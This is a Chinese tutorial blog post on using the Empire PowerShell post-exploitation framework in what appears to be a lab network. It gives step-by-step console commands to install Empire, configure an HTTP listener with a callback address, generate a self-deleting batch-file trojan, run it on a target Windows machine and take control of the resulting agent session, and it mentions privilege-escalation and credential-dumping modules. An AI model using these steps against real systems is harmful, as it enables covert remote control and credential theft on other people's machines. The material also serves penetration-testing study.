![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K11M7-0.jpg)
文章插图
前言:Empire一款基于PowerShell的后渗透测试工具 。感谢某葵和某Egg的推荐和指点 。感谢某骗子给我解惑DNS的一些东西 。
安装:
- github项目地址:https://github.com/EmpireProject/Empire
- 下载:git clone https://github.com/EmpireProject/Empire.git
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K15348-1.jpg)
文章插图
- Empiresetup目录执行install.sh文件./install.sh
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K113K-2.jpg)
文章插图
开始下载安装运行依赖文件
最后设置数据库密码那里可以默认回车,也可以自己设置
踩坑经历:
如果安装途中,遇到网络问题,多次执行./install.sh文件安装全部依赖,运行主目录下empire启动程序前,先执行setup目录下的reset.sh后再执行主目录empire文件 。
- 使用(Empire)> listeners # 监听
- 监听
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K11045-3.jpg)
文章插图
(Empire: listeners) > uselistener http #选择监听方式
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K13V4-4.jpg)
文章插图
(Empire: listeners/http) > info #查看需要配置的选项
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K132F-5.jpg)
文章插图
(Empire: listeners/http) > set Name backdoor #设置监听名字
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K15557-6.jpg)
文章插图
养成良好的习惯设置自己容易理解的名字,方便管理shell
(Empire: listeners/http) > set Host http://192.168.80.131:4447 #设置木马反弹回连地址
(Empire: listeners/http) > set Port 4447 #设置本地监听端口
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K11936-7.jpg)
文章插图
(Empire: listeners/http) > execute #执行监听
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K1B08-8.jpg)
文章插图
至此,监听工作完成 。我们开始配置生成后门 。
- 生成木马(Empire: listeners/http) > back #返回上层模块(Empire: listeners) > usestager windows/launcher_bat backdoor # 选择木马种类
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K154C-9.jpg)
文章插图
这里我选择的是bat类型的脚本,当然你们可以选择其他的 。后面的backdoor就是刚刚我们设置的监听,这个模块就是依据监听的配置信息,生成相应的木马,让反弹马找到连接主机 。
(Empire: stager/windows/launcher_bat) > info #查看需要配置的
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K11N6-10.jpg)
文章插图
你可以set OutFile 到你指定的目录(绝对路径)
(Empire: stager/windows/launcher_bat) > execute #执行生成木马
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K11441-11.jpg)
文章插图
我们把tmp目录下的文件拷贝到我们的目标主机上运行
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K12X2-12.jpg)
文章插图
弹出一个黑框后,它自动消失了,是因为我们刚才生成backdoor的时候其中一个选项delete设置的True,运行结束后删除自身 。
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K11541-13.jpg)
文章插图
点击完我们的backdoor之后,我们回到我们的机器可以看到已经获取到了客户端的一个会话 。
【内网渗透力杠杠的工具学习之Empire后渗透】(Empire: stager/windows/launcher_bat) > agents #查看获取的代理会话
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K11935-14.jpg)
文章插图
一个会话已经建立完成 。
(Empire: agents) > rename HZFT7AX1 win7pro #更改会话名字
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K14495-15.jpg)
文章插图
养成一个良好的习惯 。
(Empire: agents) > interact win7pro #和该会话交互
![内网渗透力杠杠的工具学习之Empire后渗透](http://img.jiangsulong.com/220411/195K13V0-16.jpg)
文章插图
从session_key这里可以看出我们的会话是经过加密的 。
同时该框架还提供了bypassuac,mimikaz等模块,为渗透提供高效,快速的提升权限,信息获取 。
推荐阅读
- 内网域实战渗透常用命令总结
- 两种网络地址段,如何设置内网和外网一起上?
- 利用ssh将内网端口反向连接穿透到外网vps
- 5分钟实现内网穿透
- 双杠杠臂屈伸的方法
- 办公室上网攻略--内网、外网、路由,自主控制
- ngrok服务器搭建 一分钟实现内网穿透
- 内网域实战渗透常用命令
- Ngrok:超简单的内网穿透,了解一下?
- Windows内网协议学习Kerberos篇之PAC